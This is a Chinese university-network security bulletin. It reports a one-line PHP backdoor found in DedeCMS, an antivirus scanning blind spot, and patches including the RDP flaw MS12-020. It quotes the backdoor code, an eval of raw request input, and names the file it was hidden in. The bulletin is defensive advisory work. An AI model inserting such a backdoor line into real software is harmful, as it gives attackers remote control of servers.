内容管理系统曝“一句话”后门

文/郑先伟

内容管理系统曝“一句话”后门

文/郑先伟

3月是开学的第一个月，教育网整体运行平稳，未发生影响严重的安全事件，不过，开学后安全投诉事件的数量较寒假期间有了较大的增长。

CMS存在后门程序影响服务器安全

值得关注的是一个名叫DedeCMS（中文名：织梦）的免费开源CMS系统传出被放置了“一句话”后门程序。黑客在该系统某些版本中的shopcar.class.php文件中植入一句后门代码“@eval(file_get_contents('php://input'));”。利用这个被插入了代码的网页，黑客只需要远程构造简单的数据包并提交给服务器，就能够获取到该网站的WebShell，再向服务器上传PHP木马程序，就有可能完全控制相关的服务器。从目前我们掌握的情况看，有不少学校的网站是使用这款免费的系统搭建的，黑客通过搜索引擎很容易定位出有问题的网站地址。我们建议使用开源CMS系统搭建网站的管理员应该尽快修改升级自己网站的代码，或者使用一些其他的防护手段（如使用专用的Web防火墙等）进行防护。

多款杀毒软件存在查杀真空区

近期没有新增危害特别严重的木马病毒程序。值得注意的是多款杀毒软件被曝出存在查杀真空区，原因是这些杀毒软件所用的查杀引擎为了提高扫描速度对一些特定格式文件中的某些字段做了标志，当扫描到有这些特殊标志的文件时就认为是系统的合法文件而不进行扫描，这就导致如果病毒也采用这种格式并且在特定字段上也放置相应的标志就能成功地躲过杀毒软件的查杀。目前国内国外的多款杀毒软件都发现存在类似的问题，建议用户随时关注软件版本的更新。

近期新增严重漏洞评述

微软3月份发布6个安全公告，其中一个为严重等级，4个为重要等级，1个为中等等级，共修复了Windows操作系统、Visual Studio开发工具和Expression Design绘图编辑工具等多个产品中存在的7处安全漏洞，用户应该尽快使用系统自带的更新功能安装相应的补丁程序。

浏览器方面，Google的Chrome浏览器发布最新版本17.0.963.83，修补之前版本中的多个安全漏洞（http://www.google.cn/chrome/）。Mozilla公司发布Firefox浏览器的安全补丁更新，修补之前版本中的多个安全漏洞（https://www.mozilla.org/security/announce/2012/mfsa2012-19.html）。使用上述浏览器的用户应尽快使用软件自带的安全更新功能进行升级。

浏览器插件方面，Adobe公司发布了Flash Player的补丁程序，修补之前版本中的两个远程代码执行漏洞（http://www.adobe.com/support/security/bulletins/apsb12-05.html）。

Windows远程桌面协议RDP远程代码执行及拒绝服务攻击漏洞（MS12-020)

影响系统

Windows XP

Windows 2003

Windows 2008

Windows Vista

Windows 7

漏洞信息

Windows远程桌面服务（RDP，Remote Desktop Protocol）是Windows系统自带的用于提供远程操作Windows系统的服务，默认的服务端口为3389。

Windows RDP服务程序在实现上存在错误，没有有效的定义及回收内存，导致一些特定的内存在释放后没有得到有效回收，攻击者可以构造特定的数据覆盖这些内存空间，随后引用这些内存中的指令。成功的远程攻击者在未经认证的情况下往服务器发送畸形恶意的数据包，便可以以系统权限或者NET SERVICE权限执行任意命令。

漏洞危害

这个漏洞是近年来少有的能够通过网络开放端口直接远程利用的漏洞，它可以被用来进行蠕虫病毒的传播。虽然微软号称是从秘密渠道获得漏洞信息，但是提供这些漏洞信息的是一个有名的黑客组织，因此不排除漏洞信息实际已经在黑客组织地下流传。目前互联网上已经公布该漏洞拒绝服务攻击的代码（测试后能够导致漏洞主机蓝屏），远程代码执行的攻击代码很可能在近期就会被公布。建议管理员或用户应该尽快安装相应的补丁程序。

解决办法

目前厂商已经针对该漏洞发布相应的安全公告和补丁程序，我们建议用户尽快安装相应的补丁程序：

http://www.microsoft.com/technet/security/bulletin/MS12-020.asp

（作者单位为中国教育和科研计算机网应急响应组）